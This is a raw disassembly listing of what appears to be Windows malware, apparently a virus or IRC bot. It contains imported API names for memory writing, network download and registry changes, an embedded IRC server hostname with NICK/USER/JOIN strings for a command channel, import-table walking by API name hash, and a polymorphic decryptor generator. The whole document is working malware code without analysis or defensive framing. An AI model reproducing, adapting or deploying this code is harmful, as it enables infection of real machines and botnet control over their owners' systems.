aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetc_0 db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey_0 db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_42258A proc near ; CODE XREF: .rsrc:00422631�p
; .rsrc:00422642�p ...
var_6 = byte ptr -6
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+3]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4035F0h]
add esp, 0Ch
call dword ptr ss:loc_4035F4[ebp]
add esp, 8
retn
sub_42258A endp
; ---------------------------------------------------------------------------
push edi
lea eax, [ebp+4015B1h]
xor edi, edi
push eax
push 0
push 0Eh
call dword ptr ss:loc_4035A4[ebp]
test eax, eax
jz loc_42266D
push eax
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 100000h
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push ebx
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
call dword ptr [ebp+40353Ch]
test edi, edi
jz short loc_42266D
mov ecx, [ebp+401588h]
jecxz short loc_422625
lea edx, sub_401000[ebp]
add edx, ecx
push edi
push ebx
call edx
loc_422625: ; CODE XREF: .rsrc:00422617�j
mov eax, [ebp+4035D4h]
lea ecx, [edi+2394h]
call sub_42258A
mov eax, dword ptr ss:loc_4035E8[ebp]
lea ecx, [edi+23E1h]
call sub_42258A
mov eax, dword ptr ss:loc_4035D8[ebp]
lea ecx, [edi+23E8h]
call sub_42258A
mov eax, [ebp+4035DCh]
test eax, eax
jz short loc_42266D
lea ecx, [edi+23F5h]
call sub_42258A
loc_42266D: ; CODE XREF: .rsrc:004225D7�j
; .rsrc:0042260F�j ...
mov eax, edi
pop edi
retn
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 401A14h
xor ecx, ecx
lea eax, [ebp+401DAEh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr ss:loc_40356C[ebp]
xchg eax, [esp]
call dword ptr [ebp+40353Ch]
pop ebp
retn 4
; ---------------------------------------------------------------------------
dd 0E855h, 815D0000h, 401A43EDh, 8DFF6A00h, 401A0E95h
dd 0CD525000h, 2A002420h, 0CC48300h, 5485C766h, 0CD00401Ah
dd 5685C720h, 2400401Ah, 5D002A00h, 6A016AC3h, 0FF33FF01h
dd 15FF0473h, 0F074C085h, 0B68h, 5BD08B00h, 8D3C5003h
dd 401A72B5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C783C2EBh, 0D48B570Fh
dd 50CC8B53h, 51406A54h, 0FFFF6A52h, 4035F095h, 0CC48300h
dd 3574958Bh, 0D72B0040h, 0C707EA83h, 0E8006A07h, 3578900h
dd 581A6AC3h, 9E8h, 61428D00h, 75C9FEAAh
db 0F0h, 0C3h
; =============== S U B R O U T I N E =======================================
sub_422752 proc near ; CODE XREF: sub_422FBD+1B�p
; sub_423135+3�p ...
imul edx, dword ptr ss:loc_403646[ebp], 8088405h
inc edx
mov dword ptr ss:loc_403646[ebp], edx
mul edx
retn
sub_422752 endp
; ---------------------------------------------------------------------------
dw 0E855h
dd 0
dd 9ED815Dh, 8B00401Bh, 40364A9Dh, 247C8300h, 840F0008h
dd 0B9h, 208EC81h, 68540000h, 104h, 359095FFh, 0FC8B0040h
dd 424848Dh, 50000001h, 4E8006Ah, 56000000h, 57005452h
dd 358C95FFh, 0C9330040h, 104978Dh, 51510000h, 6A51026Ah
dd 6801h, 0FF524000h, 40355C95h, 0F6859600h, 54505B74h
dd 10468h, 0B4FF5700h, 22024h, 2895FF00h, 59004036h, 1674C085h
dd 8B5014E3h, 52006AD4h, 0FF565751h, 4035CC95h, 0C0855900h
dd 0FF56D075h, 40353C95h, 44578D00h, 446A5752h, 4978D58h
dd 0AB000001h, 106AC033h, 50ABF359h, 50505050h, 0FF525050h
dd 40356495h, 8C48100h, 0FF000002h, 0FF082474h, 40361895h
dd 95FF5300h, 403618h, 4C25Dh, 750A3E80h, 8D8B4601h, 401584h
dd 958D19E3h, 401000h, 0FF56D103h, 0FC084D2h, 11F88h, 10840F00h
dd 80000001h, 10753A3Eh, 3E8046h, 101840Fh, 3E800000h
dd 46F17520h, 49503E81h, 4275474Eh, 46C6CF8Bh, 0CE2B4F01h
dd 51006A51h, 95FF5356h, 403610h, 0FC13B59h, 0DF85h, 0A2858D00h
dd 6A00401Dh, 0C6800h, 53500000h, 361095FFh, 0C3D0040h
dd 0F000000h, 0BF85h, 0B1E900h, 3E810000h, 56495250h, 0A5850Fh
dd 0C6830000h, 0D3CAC08h, 99840Fh, 203C0000h, 3CACF375h
dd 8C850F3Ah, 0AD000000h, 2020200Dh, 67213D20h, 7F757465h
dd 75203CACh, 0FF7E817Ch, 74746820h, 7E817175h, 2F3A7003h
dd 0C668752Fh, 0F00FF47h, 2710BA31h, 0E2F70000h, 0BC95FF52h
dd 33004035h, 505050C0h, 9E850h, 6F440000h, 6F6C6E77h
dd 0FF006461h, 40362095h, 74C08500h, 89C93336h, 40364A85h
dd 685100h, 51800002h, 0FF505651h, 40362495h, 3958D00h
dd 5000401Bh, 5154C933h, 51515250h, 356C95FFh, 4870040h
dd 3C95FF24h, 0F8004035h, 778D80C3h, 1004015h, 4F53C3F9h
dd 41575446h, 4D5C4552h, 6F726369h, 74666F73h, 6E69575Ch
dd 73776F64h, 7275435Ch, 746E6572h, 73726556h, 5C6E6F69h
dd 6C707845h, 7265726Fh, 72615400h, 48746567h, 74736Fh
dd 0F0FF0002h, 0
aProxim_ircgala db 'proxim.ircgalaxy.pl',0
aNickStbskqisUs db 'NICK stbskqis',0Ah
db 'USER d020501 . . :-JOIN &virtu',0Ah
db 'Uè',0
dd 5D000000h, 1DB4ED81h, 85C60040h, 401577h, 9495FF00h
dd 0C1004035h, 3C741FE8h, 0B58B1E6Ah, 403550h, 2E3CAC59h
dd 81662A75h, 751DFF3Eh, 40BD8D23h, 8B004036h, 0A5570276h
dd 858DA566h, 40336Ah, 3390858Fh, 89FA0040h, 4E8CFA46h
dd 1B1FBFEh, 43EBCFE2h, 15B1858Dh, 6A500040h, 0FF0E6A00h
dd 4035A495h, 247C8300h, 2B750408h, 4E8h, 43465300h, 8895FF00h
dd 0E8004035h, 0FFFFFC48h, 7E8h, 43465300h, 534F5Fh, 358895FFh
dd 31E80040h, 0E8FFFFFCh, 0FFFFF356h, 13038DFFh, 0BE80040h
dd 55000000h, 33524553h, 4C442E32h, 95FF004Ch, 40359Ch
dd 0AE8h, 70737700h, 746E6972h, 50004166h, 354895FFh, 85890040h
dd 403554h, 8D8D310Fh, 4018E0h, 36468589h, 0FF510040h
dd 40359C95h, 4689300h, 8D000000h, 4018EDB5h, 0BD8D5900h
dd 40362Ch, 0FFF6D6E8h, 85C766FFh, 401D67h, 0A583F0FFh
dd 401D69h, 27958D00h, 5000401Dh, 6A016A54h, 2685200h
dd 0FF800000h, 40363095h, 5AC08500h, 8D8D2275h, 401D5Ah
dd 8D066A52h, 401D67B5h, 50565400h, 0FF525150h, 40363495h
dd 95FF5800h, 40362Ch, 384D85C6h, 0E8000040h, 0Ch, 434F5357h
dd 2E32334Bh, 4C4C44h, 359C95FFh, 68930040h, 7, 1844B58Dh
dd 8D590040h, 4035FCBDh, 0F651E800h, 0CE8FFFFh, 57000000h
dd 4E494E49h, 442E5445h, 0FF004C4Ch, 40359C95h, 0FC08500h
dd 1E784h, 5689300h, 8D000000h, 401882B5h, 0BD8D5900h
dd 403618h, 0FFF61AE8h, 1CBD83FFh, 4036h, 1C2840Fh, 0EC810000h
dd 190h, 1016854h, 95FF0000h, 4035FCh, 190C481h, 8B500000h
dd 52006AD4h, 361C95FFh, 0C0850040h, 680D7559h, 1388h
dd 35BC95FFh, 0E2EB0040h, 1D69BD83h, 75000040h, 6D858D29h
dd 5000401Dh, 360895FFh, 0C0850040h, 13B840Fh, 408B0000h
dd 0FF008B0Ch, 69858F30h, 0C600401Dh, 40384D85h, 6A0100h
dd 26A016Ah, 361495FFh, 0F8830040h, 12840FFFh, 93000001h
dd 1D65958Dh, 106A0040h, 95FF5352h, 403604h, 850FC085h
dd 0F2h, 1D86BD8Dh, 8B10040h, 0FFFABCE8h, 9468FFh, 2B5E0000h
dd 243489E6h, 9895FF54h, 8D004035h, 401D94BDh, 0E801B100h
dd 0FFFFFA9Dh, 1024448Bh, 0B08E0C1h, 0C1042444h, 440B08E0h
dd 0E8500824h, 5, 78362E25h, 95FF5700h, 403554h, 0C60CC483h
dd 8D200647h, 401D8195h, 68006A00h, 21h, 95FF5352h, 403610h
dd 14247C8Dh, 5895FF57h, 0C6004035h, 400A3804h, 5750006Ah
dd 1095FF53h, 3004036h, 0A2BD8DE6h, 6A00401Dh, 0C6800h
dd 53570000h, 361095FFh, 0C3D0040h, 75000000h, 4EB58D4Dh
dd 8D004036h, 40384D8Dh, 6ACE2B00h, 53565100h, 360C95FFh
dd 0F8830040h, 912F7E00h, 0B58DFE8Bh, 40364Eh, 0AEF20DB0h
dd 0E8601075h, 0FFFFFAF8h, 0E3177261h, 1778D09h, 0CF8BEAEBh
dd 0BD8DCE2Bh, 40364Eh, 0F787A4F3h, 0FF53B9EBh, 40360095h
dd 77BD8000h, 1004015h, 30682A74h, 0FF000075h, 4035BC95h
dd 4DBD8000h, 4038h, 85C71174h, 401D69h, 0
dd 384D85C6h, 0E9000040h, 0FFFFFE56h, 158085C7h, 40h, 0C25D8000h
dd 0A0D0004h, 6F6E204Fh, 6F206E6Fh, 696C2066h, 20216566h
dd 6974204Fh, 7420656Dh, 6563206Fh, 7262656Ch, 21657461h
dd 20200A0Dh, 4F202020h, 6D757320h, 2072656Dh, 64726167h
dd 0D216E65h, 6C65520Ah, 6C746E65h, 6C737365h, 61682079h
dd 20797070h, 20646E61h, 65707865h, 6E617463h, 73202C74h
dd 646E6174h, 3A676E69h, 0A0D2D20h, 63746157h, 676E6968h
dd 6C6C6120h, 79616420h, 646E6120h, 67696E20h, 202C7468h
dd 20726F66h, 65697266h, 2073646Eh, 61772049h, 0D3A7469h
dd 6568570Ah, 61206572h, 79206572h, 202C756Fh, 65697266h
dd 3F73646Eh, 6D6F4320h, 49202165h, 73692074h, 6D697420h
dd 49202165h, 20732774h, 6574616Ch, 290A0D21h, 5710A614h
dd 0ED3AAB59h, 0E54FD479h, 427B1FAh, 4730C784h, 5C6299ADh
dd 7EC26CCCh, 481A73C1h, 0A8403752h, 134CA2A1h, 6A10A614h
dd 52606EF9h, 0D8B8B3h, 12h dup(0)
db 3 dup(0)
; =============== S U B R O U T I N E =======================================
sub_422F07 proc near ; CODE XREF: sub_422F4E:loc_422FAB�p
; sub_42300E+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+4039A6h], 0
and dword ptr ss:loc_4039AA[ebp], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_422F23: ; CODE XREF: sub_422F07+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_422F45
cmp eax, [edx+8]
jnb short loc_422F45
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+4039A6h], edx
mov dword ptr ss:loc_4039AA[ebp], eax
jmp short loc_422F4A
; ---------------------------------------------------------------------------
loc_422F45: ; CODE XREF: sub_422F07+23�j
; sub_422F07+28�j
add edx, 28h
loop loc_422F23
loc_422F4A: ; CODE XREF: sub_422F07+3C�j
popa
retn 4
sub_422F07 endp
; =============== S U B R O U T I N E =======================================
sub_422F4E proc near ; CODE XREF: .rsrc:0042327A�p
; .rsrc:004232A0�p
mov byte ptr ss:locret_4022F7[ebp], al
call sub_422FBD
push 20h
lea eax, [ebp+402224h]
pop ecx
loc_422F65: ; CODE XREF: sub_422F4E+1E�j
cmp [eax], ebx
jz short loc_422F75
add eax, 4
loop loc_422F65
inc dword ptr ss:loc_40398E[ebp]
retn
; ---------------------------------------------------------------------------
loc_422F75: ; CODE XREF: sub_422F4E+19�j
neg ecx
add ecx, dword ptr ss:locret_4022F7[ebp]
jecxz short loc_422F8F
loc_422F7F: ; CODE XREF: sub_422F4E+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_422F7F
mov [ebp+402224h], ebx
loc_422F8F: ; CODE XREF: sub_422F4E+2F�j
; sub_422FBD+34�j
cmp dword ptr [edx], 0
jz short loc_422F99
sub esi, [edx]
add esi, [edx+10h]
loc_422F99: ; CODE XREF: sub_422F4E+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_422FA8
push dword ptr [edx]
jmp short loc_422FAB
; ---------------------------------------------------------------------------
loc_422FA8: ; CODE XREF: sub_422F4E+54�j
push dword ptr [edx+10h]
loc_422FAB: ; CODE XREF: sub_422F4E+58�j
call sub_422F07
sub ecx, esi
sub ecx, dword ptr ss:loc_4039AA[ebp]
pop eax
add ecx, [ebx+34h]
retn
sub_422F4E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_422FBD proc near ; CODE XREF: sub_422F4E+6�p
pop dword ptr ss:locret_403992[ebp]
mov dword ptr ss:loc_40398E[ebp], 0
call sub_42300E
mov eax, dword ptr ss:loc_40398E[ebp]
call sub_422752
call sub_422FFA
cmp dword ptr ss:loc_40398E[ebp], 0
jnz short loc_422FF3
mov dword ptr ss:sub_4022A0[ebp], ebx
jmp short loc_422F8F
; ---------------------------------------------------------------------------
loc_422FF3: ; CODE XREF: sub_422FBD+2C�j
dec dword ptr ss:loc_40398E[ebp]
retn
sub_422FBD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_422FFA proc near ; CODE XREF: sub_422FBD+20�p
pop dword ptr ss:locret_403992[ebp]
mov dword ptr ss:loc_40398E[ebp], edx
call sub_42300E
xor ecx, ecx
retn
sub_422FFA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42300E proc near ; CODE XREF: sub_422FBD+10�p
; sub_422FFA+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_422F07
add edx, dword ptr ss:loc_4039AA[ebp]
add edx, esi
loc_423022: ; CODE XREF: sub_42300E+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_423133
cmp dword ptr [edx+10h], 0
jz locret_423133
mov eax, [edx+0Ch]
push eax
call sub_422F07
add eax, dword ptr ss:loc_4039AA[ebp]
add eax, esi
push eax
loc_423048: ; CODE XREF: sub_42300E+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_423068
cmp cl, 2Eh
jz short loc_423057
loc_423054: ; CODE XREF: sub_42300E+58�j
inc eax
jmp short loc_423048
; ---------------------------------------------------------------------------
loc_423057: ; CODE XREF: sub_42300E+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_423054
loc_423068: ; CODE XREF: sub_42300E+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_42312B
cmp word ptr [eax-2], 3233h
jnz loc_42312B
push esi
cmp dword ptr [edx], 0
jnz short loc_42308B
mov ecx, [edx+10h]
jmp short loc_42308D
; ---------------------------------------------------------------------------
loc_42308B: ; CODE XREF: sub_42300E+76�j
mov ecx, [edx]
loc_42308D: ; CODE XREF: sub_42300E+7B�j
add esi, ecx
push ecx
call sub_422F07
add esi, dword ptr ss:loc_4039AA[ebp]
loc_42309B: ; CODE XREF: sub_42300E+90�j
; sub_42300E+117�j
lodsd
test eax, eax
js short loc_42309B
jz loc_42312A
push dword ptr ss:loc_4039AA[ebp]
push eax
call sub_422F07
add eax, dword ptr ss:loc_4039AA[ebp]
pop dword ptr ss:loc_4039AA[ebp]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_4230C7: ; CODE XREF: sub_42300E+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_4230DE
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_4230C7
; ---------------------------------------------------------------------------
loc_4230DE: ; CODE XREF: sub_42300E+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_423124
cmp ebx, 0DB6E45A8h
jz short loc_423124
cmp ebx, 0FFA13B59h
jz short loc_423124
cmp ebx, 0ACB522D6h
jz short loc_423124
cmp ebx, 0F358E993h
jz short loc_423124
cmp ebx, 0F358E97Dh
jz short loc_423124
cmp ebx, 0E1253F46h
jz short loc_423124
cmp ebx, 0E1253F30h
jz short loc_423124
call dword ptr ss:locret_403992[ebp]
loc_423124: ; CODE XREF: sub_42300E+D6�j
; sub_42300E+DE�j ...
pop ebx
jmp loc_42309B
; ---------------------------------------------------------------------------
loc_42312A: ; CODE XREF: sub_42300E+92�j
pop esi
loc_42312B: ; CODE XREF: sub_42300E+60�j
; sub_42300E+6C�j
add edx, 14h
jmp loc_423022
; ---------------------------------------------------------------------------
locret_423133: ; CODE XREF: sub_42300E+18�j
; sub_42300E+22�j
retn
sub_42300E endp
; ---------------------------------------------------------------------------
db 3
; =============== S U B R O U T I N E =======================================
sub_423135 proc near ; CODE XREF: .rsrc:00423273�p
; .rsrc:00423299�p
push 4
pop eax
call sub_422752
mov [ebp+4024D1h], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_422752
add edx, 8
xchg edx, ecx
loc_42315D: ; CODE XREF: sub_423135:loc_42319C�j
push 5
pop eax
call sub_422752
cmp dl, 3
jnb short loc_423175
mov al, 50h
add al, [ebp+4024D1h]
stosb
jmp short loc_42319C
; ---------------------------------------------------------------------------
loc_423175: ; CODE XREF: sub_423135+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_423196
mov al, 11h
call sub_422752
mov eax, 1
loc_42318A: ; CODE XREF: sub_423135+5D�j
test dl, dl
jz short loc_42319B
shl eax, 1
dec dl
jmp short loc_42318A
; ---------------------------------------------------------------------------
jmp short loc_42319B
; ---------------------------------------------------------------------------
loc_423196: ; CODE XREF: sub_423135+47�j
mov eax, 80000000h
loc_42319B: ; CODE XREF: sub_423135+57�j
; sub_423135+5F�j
stosd
loc_42319C: ; CODE XREF: sub_423135+3E�j
loop loc_42315D
retn
sub_423135 endp
; ---------------------------------------------------------------------------
loc_42319F: ; CODE XREF: sub_423BF9+112�p
lea edi, [ebp+40343Ch]
test dword ptr [ebp+403431h], 80000000h
jz short loc_4231B4
mov al, 60h
stosb
loc_4231B4: ; CODE XREF: .rsrc:004231AF�j
test dword ptr [ebp+403431h], 1000003h
jz loc_4232BA
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0BDCBDD78h
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test dword ptr [ebp+403431h], 1000000h
mov dword ptr ss:loc_40399A[ebp], edi
jz short loc_423232
test dword ptr [ebp+403431h], 2000000h
mov eax, 36FF6467h
jnz short loc_4231FD
mov eax, 2E8B6467h
loc_4231FD: ; CODE XREF: .rsrc:004231F6�j
stosd
mov ax, 0
stosw
jz short loc_423209
mov al, 5Dh
stosb
loc_423209: ; CODE XREF: .rsrc:00423204�j
test dword ptr [ebp+403431h], 8000000h
mov eax, 86D8Dh
jnz short loc_423230
test dword ptr [ebp+403431h], 4000000h
mov eax, 8C583h
jz short loc_423230
mov eax, 0F8ED83h
loc_423230: ; CODE XREF: .rsrc:00423218�j
; .rsrc:00423229�j
stosd
dec edi
loc_423232: ; CODE XREF: .rsrc:004231E5�j
test dword ptr [ebp+403431h], 3
jz short loc_423242
mov al, 0E9h
stosb
stosd
loc_423242: ; CODE XREF: .rsrc:0042323C�j
mov eax, dword ptr ss:locret_403996[ebp]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test dword ptr [ebp+403431h], 3
jz short loc_4232BA
mov eax, 36FF6467h
mov dword ptr ss:loc_40399E[ebp], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_423135
mov al, 20h
call sub_422F4E
jecxz short loc_4232BA
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, [ebp+403431h]
not edx
test edx, 3
jnz short loc_4232AD
call sub_423135
mov al, 1Fh
call sub_422F4E
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_4232AD: ; CODE XREF: .rsrc:00423297�j
mov ecx, edi
mov eax, dword ptr ss:loc_40399E[ebp]
sub ecx, eax
mov [eax-4], ecx
loc_4232BA: ; CODE XREF: .rsrc:004231BE�j
; .rsrc:00423259�j ...
test dword ptr [ebp+403431h], 4
jz short loc_4232D8
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_4232D8: ; CODE XREF: .rsrc:004232C4�j
test dword ptr [ebp+403431h], 8
jnz short loc_42332E
cmp byte ptr [ebp+40342Fh], 0
jz short loc_42332E
mov eax, 0C9291829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosd
mov al, 0B1h
stosb
mov al, [ebp+40342Fh]
stosb
mov al, 40h
or al, [ebp+40342Bh]
stosb
mov ax, 0FDE2h
test dword ptr [ebp+403431h], 10h
jz short loc_42332C
mov al, 49h
stosb
mov ax, 0FC75h
loc_42332C: ; CODE XREF: .rsrc:00423323�j
stosw
loc_42332E: ; CODE XREF: .rsrc:004232E2�j
; .rsrc:004232EB�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov [ebp+403982h], edi
test dword ptr [ebp+403431h], 20h
jnz short loc_42334F
mov al, 58h
or al, [ebp+403429h]
stosb
loc_42334F: ; CODE XREF: .rsrc:00423344�j
mov ax, 0C081h
test dword ptr [ebp+403431h], 40h
jz short loc_423362
add ah, 28h
loc_423362: ; CODE XREF: .rsrc:0042335D�j
or ah, [ebp+403429h]
stosw
mov dword ptr ss:loc_403986[ebp], edi
stosd
test dword ptr [ebp+403431h], 40000000h
jnz short loc_423386
mov al, 50h
add al, [ebp+403429h]
stosb
loc_423386: ; CODE XREF: .rsrc:0042337B�j
test dword ptr [ebp+403431h], 80h
jnz short loc_42339D
mov al, 0B8h
or al, byte ptr ss:loc_40342A[ebp]
stosb
jmp short loc_4233DA
; ---------------------------------------------------------------------------
loc_42339D: ; CODE XREF: .rsrc:00423390�j
mov ax, 1831h
test dword ptr [ebp+403431h], 100h
jz short loc_4233AF
mov al, 29h
loc_4233AF: ; CODE XREF: .rsrc:004233AB�j
or ah, byte ptr ss:loc_40342A[ebp]
shl ah, 3
or ah, byte ptr ss:loc_40342A[ebp]
stosw
mov ax, 0F081h
test dword ptr [ebp+403431h], 200h
jnz short loc_4233D2
mov ah, 0C8h
loc_4233D2: ; CODE XREF: .rsrc:004233CE�j
or ah, byte ptr ss:loc_40342A[ebp]
stosw
loc_4233DA: ; CODE XREF: .rsrc:0042339B�j
mov [ebp+4039A2h], edi
mov eax, 243Ch
stosd
test dword ptr [ebp+403431h], 8
jz short loc_42345E
test dword ptr [ebp+403431h], 400h
jnz short loc_423409
mov al, 0B8h
or al, [ebp+40342Bh]
stosb
jmp short loc_423456
; ---------------------------------------------------------------------------
loc_423409: ; CODE XREF: .rsrc:004233FC�j
test dword ptr [ebp+403431h], 800h
jnz short loc_423426
mov ax, 0E083h
or ah, [ebp+40342Bh]
stosw
xor eax, eax
stosb
jmp short loc_42343B
; ---------------------------------------------------------------------------
loc_423426: ; CODE XREF: .rsrc:00423413�j
mov ax, 1829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosw
loc_42343B: ; CODE XREF: .rsrc:00423424�j
test dword ptr [ebp+403431h], 1000h
mov ax, 0C081h
jz short loc_42344E
add ah, 8
loc_42344E: ; CODE XREF: .rsrc:00423449�j
or ah, [ebp+40342Bh]
stosw
loc_423456: ; CODE XREF: .rsrc:00423407�j
movzx eax, byte ptr [ebp+40342Fh]
stosd
loc_42345E: ; CODE XREF: .rsrc:004233F0�j
test dword ptr [ebp+403431h], 40000000h
jz short loc_423473
mov al, 50h
add al, [ebp+403429h]
stosb
loc_423473: ; CODE XREF: .rsrc:00423468�j
test dword ptr [ebp+403431h], 2000h
mov al, 86h
jnz short loc_423483
add al, 4
loc_423483: ; CODE XREF: .rsrc:0042347F�j
lea ecx, [edi-2]
mov ah, [ebp+403429h]
mov dword ptr ss:loc_40398A[ebp], ecx
stosw
cmp ah, 5
jnz short loc_4234A0
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_4234A0: ; CODE XREF: .rsrc:00423497�j
test dword ptr [ebp+403431h], 4000h
mov ax, 3166h
jnz short loc_4234B2
mov ah, 29h
loc_4234B2: ; CODE XREF: .rsrc:004234AE�j
stosw
mov al, 18h
or al, [ebp+40342Bh]
shl al, 3
stosb
mov al, 88h
test dword ptr [ebp+403431h], 8000h
jnz short loc_4234D0
mov al, 86h
loc_4234D0: ; CODE XREF: .rsrc:004234CC�j
mov ah, [ebp+403429h]
stosw
cmp ah, 5
jnz short loc_4234E4
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_4234E4: ; CODE XREF: .rsrc:004234DB�j
test dword ptr [ebp+403431h], 10000h
jnz short loc_4234FB
mov al, 40h
or al, [ebp+403429h]
stosb
jmp short loc_42350A
; ---------------------------------------------------------------------------
loc_4234FB: ; CODE XREF: .rsrc:004234EE�j
mov ax, 0C083h
or ah, [ebp+403429h]
stosw
mov al, 1
stosb
loc_42350A: ; CODE XREF: .rsrc:004234F9�j
test dword ptr [ebp+403431h], 20000h
jnz short loc_423545
test dword ptr [ebp+403431h], 40000h
jnz short loc_42353C
mov al, 0C0h
or al, [ebp+40342Bh]
mov ah, [ebp+403430h]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_423544
; ---------------------------------------------------------------------------
loc_42353C: ; CODE XREF: .rsrc:00423520�j
mov al, 40h
or al, [ebp+40342Bh]
loc_423544: ; CODE XREF: .rsrc:0042353A�j
stosb
loc_423545: ; CODE XREF: .rsrc:00423514�j
test dword ptr [ebp+403431h], 80000h
jnz short loc_423561
mov ax, 0E883h
or ah, byte ptr ss:loc_40342A[ebp]
stosw
mov al, 1
jmp short loc_423569
; ---------------------------------------------------------------------------
loc_423561: ; CODE XREF: .rsrc:0042354F�j
mov al, 48h
or al, byte ptr ss:loc_40342A[ebp]
loc_423569: ; CODE XREF: .rsrc:0042355F�j
stosb
test dword ptr [ebp+403431h], 100000h
mov cl, 75h
jnz short loc_42359D
mov ax, 0F883h
or ah, byte ptr ss:loc_40342A[ebp]
stosw
xor eax, eax
stosb
sub dword ptr ss:loc_40398A[ebp], edi
test dword ptr [ebp+403431h], 200000h
jnz short loc_4235B8
mov cl, 77h
jmp short loc_4235B8
; ---------------------------------------------------------------------------
loc_42359D: ; CODE XREF: .rsrc:00423576�j
mov ax, 1809h
or ah, byte ptr ss:loc_40342A[ebp]
shl ah, 3
or ah, byte ptr ss:loc_40342A[ebp]
stosw
sub dword ptr ss:loc_40398A[ebp], edi
loc_4235B8: ; CODE XREF: .rsrc:00423597�j
; .rsrc:0042359B�j
mov al, cl
mov ah, byte ptr ss:loc_40398A[ebp]
stosw
mov al, 58h
add al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 1000003h
jz loc_423662
mov eax, 268B6467h
mov ecx, [ebp+403431h]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_4235F9
mov eax, 2E876467h
loc_4235F9: ; CODE XREF: .rsrc:004235F2�j
stosd
mov eax, 0
stosw
jnz short loc_423609
mov ax, 0E58Bh
stosw
loc_423609: ; CODE XREF: .rsrc:00423601�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr [ebp+403431h], 1000000h
jnz short loc_42365F
test dword ptr [ebp+403431h], 8000000h
jz short loc_423651
mov ax, 6C8Dh
test dword ptr [ebp+403431h], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_42364C
mov ax, 424h
stosw
jmp short loc_42365F
; ---------------------------------------------------------------------------
loc_42364C: ; CODE XREF: .rsrc:00423642�j
mov al, 8
stosb
jmp short loc_42365F
; ---------------------------------------------------------------------------
loc_423651: ; CODE XREF: .rsrc:00423629�j
mov ax, 5D58h
add al, [ebp+40342Bh]
stosw
jmp short loc_423662
; ---------------------------------------------------------------------------
loc_42365F: ; CODE XREF: .rsrc:0042361D�j
; .rsrc:0042364A�j ...
mov al, 0C9h
stosb
loc_423662: ; CODE XREF: .rsrc:004235D5�j
; .rsrc:0042365D�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_42368E
mov al, 7
sub al, [ebp+403429h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+403429h]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_42368E: ; CODE XREF: .rsrc:0042366C�j
